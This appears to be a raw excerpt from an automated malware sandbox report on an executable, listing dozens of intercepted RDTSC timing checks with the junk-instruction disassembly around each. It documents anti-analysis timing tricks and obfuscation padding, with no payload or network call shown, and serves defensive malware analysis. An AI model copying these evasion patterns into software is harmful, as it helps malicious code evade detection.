Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B4681C second address: B46820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B46820 second address: B46824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B4D767 second address: B4D76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B4D76B second address: B4D783 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0738AFBE56h 0x00000008 jc 00007F0738AFBE56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B4D4A7 second address: B4D4AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B5905D second address: B59070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0738AFBE5Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B59070 second address: B5907A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0738B194D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B591D9 second address: B591E1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B591E1 second address: B591E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B591E7 second address: B591F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0738AFBE56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B5E821 second address: B5E825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B5E825 second address: B5E82C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B6B4E6 second address: B6B4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnp 00007F0738B194DCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B6EE27 second address: B6EE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B6EE2F second address: B6EE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B7494D second address: B74957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0738AFBE56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B731F7 second address: B731FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B731FB second address: B73203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B7338E second address: B73394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B73394 second address: B7339A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B7339A second address: B733C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0738B194E0h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F0738B194DCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B733C9 second address: B733CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B736B1 second address: B736CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F0738B194E2h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B73828 second address: B73839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0738AFBE5Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B73839 second address: B7384D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0738B194D6h 0x0000000a jmp 00007F0738B194DAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B7384D second address: B73851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B74609 second address: B74616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0738B194D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B74616 second address: B74625 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F0738AFBE56h 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B74625 second address: B74630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B74630 second address: B74636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B74636 second address: B7463C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B77B59 second address: B77B64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F0738AFBE56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B77B64 second address: B77B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0738B194E1h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B77B7E second address: B77B8F instructions: 0x00000000 rdtsc 0x00000002 je 00007F0738AFBE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B77B8F second address: B77BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0738B194E2h 0x0000000f jc 00007F0738B194D6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B7A5FF second address: B7A603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B84E68 second address: B84E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B8D81C second address: B8D84F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F0738AFBE5Dh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jl 00007F0738AFBE6Ch 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F0738AFBE64h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B8D84F second address: B8D857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B8F3E6 second address: B8F3EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B9C20B second address: B9C20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B9C20F second address: B9C230 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B9DC45 second address: B9DC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: B9DC49 second address: B9DC63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F0738AFBE56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: BB7A7C second address: BB7A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: BB7BAA second address: BB7BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0738AFBE60h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: BB7BC2 second address: BB7BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0738B194DAh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: BB87CA second address: BB87D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0738AFBE56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: BB87D4 second address: BB87E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F0738B194DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: BB87E2 second address: BB880F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007F0738AFBE5Eh 0x0000000f jg 00007F0738AFBE56h 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F0738AFBE63h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: BB880F second address: BB883D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F0738B194D6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F0738B194D6h 0x00000015 jmp 00007F0738B194E9h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: BBCADF second address: BBCAE9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0738AFBE5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: BBCD4C second address: BBCD52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52600FA second address: 52600FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52600FF second address: 5260110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, dx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5260110 second address: 5260114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5260114 second address: 5260118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5260118 second address: 526011E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 526011E second address: 526012D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0738B194DBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 526012D second address: 526014A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0738AFBE60h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240E67 second address: 5240E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240E6B second address: 5240E71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240E71 second address: 5240F22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, B0h 0x00000005 pushfd 0x00000006 jmp 00007F0738B194E7h 0x0000000b sub ecx, 1BE1F5FEh 0x00000011 jmp 00007F0738B194E9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F0738B194E7h 0x00000022 sbb esi, 0AE8480Eh 0x00000028 jmp 00007F0738B194E9h 0x0000002d popfd 0x0000002e mov dh, al 0x00000030 popad 0x00000031 xchg eax, ebp 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 pushfd 0x00000036 jmp 00007F0738B194DFh 0x0000003b sbb eax, 4603861Eh 0x00000041 jmp 00007F0738B194E9h 0x00000046 popfd 0x00000047 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240F22 second address: 5240F64 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0738AFBE60h 0x00000008 and ecx, 48A77C18h 0x0000000e jmp 00007F0738AFBE5Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ecx, 24C937CFh 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0738AFBE61h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240F64 second address: 5240F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0738B194DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240F74 second address: 5240F86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx eax, dx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5290067 second address: 52900C1 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a mov esi, ebx 0x0000000c pushfd 0x0000000d jmp 00007F0738B194DFh 0x00000012 or esi, 5744D84Eh 0x00000018 jmp 00007F0738B194E9h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F0738B194E8h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52900C1 second address: 52900C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52900C7 second address: 52900CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52900CD second address: 5290106 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0738AFBE67h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5290106 second address: 5290152 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, cx 0x00000010 pushfd 0x00000011 jmp 00007F0738B194E4h 0x00000016 sbb ecx, 67C6FE48h 0x0000001c jmp 00007F0738B194DBh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220161 second address: 5220167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220167 second address: 52201B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0738B194E8h 0x00000009 add ah, FFFFFF98h 0x0000000c jmp 00007F0738B194DBh 0x00000011 popfd 0x00000012 mov edx, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 mov edx, 7F4F1B86h 0x0000001e mov dl, 6Ah 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 call 00007F0738B194DBh 0x0000002a pop esi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52201B3 second address: 52201B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52201B8 second address: 52201BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52201BE second address: 522024C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F0738AFBE5Ch 0x00000014 pushfd 0x00000015 jmp 00007F0738AFBE62h 0x0000001a adc ecx, 63D83BB8h 0x00000020 jmp 00007F0738AFBE5Bh 0x00000025 popfd 0x00000026 popad 0x00000027 jmp 00007F0738AFBE68h 0x0000002c popad 0x0000002d push dword ptr [ebp+04h] 0x00000030 jmp 00007F0738AFBE60h 0x00000035 push dword ptr [ebp+0Ch] 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b jmp 00007F0738AFBE5Dh 0x00000040 mov ax, 7CB7h 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220298 second address: 52202BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0738B194E5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240B75 second address: 5240B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240B7B second address: 5240B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 524080F second address: 5240813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240813 second address: 5240819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240819 second address: 524088F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0738AFBE5Bh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 call 00007F0738AFBE64h 0x00000016 pop edi 0x00000017 call 00007F0738AFBE5Eh 0x0000001c jmp 00007F0738AFBE62h 0x00000021 pop ecx 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 jmp 00007F0738AFBE61h 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov bh, 71h 0x00000030 mov esi, 61AC774Bh 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 524088F second address: 5240895 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240895 second address: 5240899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240760 second address: 5240766 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240766 second address: 524076C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 524076C second address: 5240770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240770 second address: 5240798 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov cx, dx 0x0000000d movsx edx, ax 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 jmp 00007F0738AFBE5Eh 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240798 second address: 52407B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52407B5 second address: 52407C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0738AFBE5Ch 0x00000009 rdtsc
